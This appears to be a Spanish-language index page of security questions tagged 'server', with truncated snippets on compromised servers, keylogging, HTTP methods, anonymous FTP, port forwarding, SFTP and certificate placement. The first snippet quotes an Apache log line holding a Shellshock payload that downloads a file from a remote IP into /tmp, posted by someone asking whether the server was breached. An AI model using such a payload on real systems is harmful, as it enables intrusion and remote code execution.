Preguntas con etiqueta 'server'

preguntas con etiqueta
1
respuesta

Los registros de Apache muestran la ejecución de los comandos

Me pregunto si mi servidor está comprometido o no. Solo miré mi registro y vi la siguiente línea allí: IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/usr/bi...
hecha 28.12.2017 - 20:24
1
respuesta

¿Es posible que un atacante registre mis pulsaciones en un servidor Linux que no tenga un sistema de ventanas X?

asumiendo lo siguiente: servidor web accesible públicamente - administrado a través de SSH no se ha instalado ningún sistema de ventanas X y no se reenvía X11 a través de SSH el atacante ha obtenido acceso y puede ejecutar un shell como...
hecha 06.12.2017 - 07:48
2
respuestas

¿Debería la aplicación web para los métodos PUT y DELETE devolver la misma respuesta que para GET?

Mi aplicación web para los métodos PUT, DELETE y cualquier método HTTP no deseado devuelve la misma respuesta que para el método GET (página principal html, no se carga ni se elimina nada), para TRACE hay respuesta 405. ¿Es esto inseguro? Muchos...
hecha 30.11.2017 - 17:36
1
respuesta

¿Un usuario FTP anónimo siempre es un riesgo (incluso si este usuario no tiene acceso a nada)?

Encontré algunos servidores FTP en una red que parecen permitir el inicio de sesión con un usuario FTP anónimo. Confirmé esto con el script ftp-anon NSE en Nmap. PORT STATE SERVICE 21/tcp open ftp |_ftp-anon: Anonymous FTP login...
hecha 01.09.2016 - 13:58
2
respuestas

¿El reenvío de puertos no es seguro? [cerrado]

Iba a realizar el reenvío de puertos para crear un servidor de juegos con una PC antigua. Me di cuenta de que hace más cosas visibles a Internet. ¿El reenvío de puertos es una mala elección considerando sus inseguridades? Además, ¿cómo podré pro...
hecha 11.10.2016 - 00:04
1
respuesta

Conectándose a un servidor comprometido

Últimamente ha habido varios hilos sobre sitios web pirateados en los que los atacantes obtienen el control de los servidores en los que se alojan estos sitios. Como tales, estos servidores deben tratarse como completamente comprometidos. A m...
hecha 29.02.2016 - 23:49
3
respuestas

¿Mi servidor ha sido comprometido? [duplicar]

- gracias a todos, esto se ha resuelto, vea mi respuesta a continuación: Creé un servidor Debian / OpenVPN hace varios meses para uso privado, pero en los últimos dos días he notado algo extremadamente inquietante y extraño. Ocurre sol...
hecha 20.10.2015 - 12:38
2
respuestas

¿Cómo funciona SFTP? Por favor ayuda a alguien [cerrado]

Ejecutamos un sistema que envía automáticamente un mensaje rápido al final de un proceso. Pero estos mensajes se envían utilizando FTP. Creemos que el proceso FTP es demasiado propenso a MITMA y deseamos cambiar el medio de envío a SFTP. ¿Cómo s...
hecha 24.06.2016 - 17:58
2
respuestas

Verificación del cliente con el servidor

Actualmente estoy diseñando un programa Java básico que utiliza sockets para comunicarse desde un servidor a varios clientes. Sin embargo, quiero que los clientes no se modifiquen para evitar que los usuarios intenten utilizar el software, no co...
hecha 09.07.2015 - 23:20
2
respuestas

¿El lugar donde coloco mis certificados PKI es importante?

Tengo un certificado PKI intermedio y uno raíz que veo que ya se importó en un almacén de certificados de computadoras (Windows Server 2003). Sin embargo, tanto los certificados intermedios como los certificados raíz se colocaron en la carpeta d...
hecha 13.08.2014 - 23:03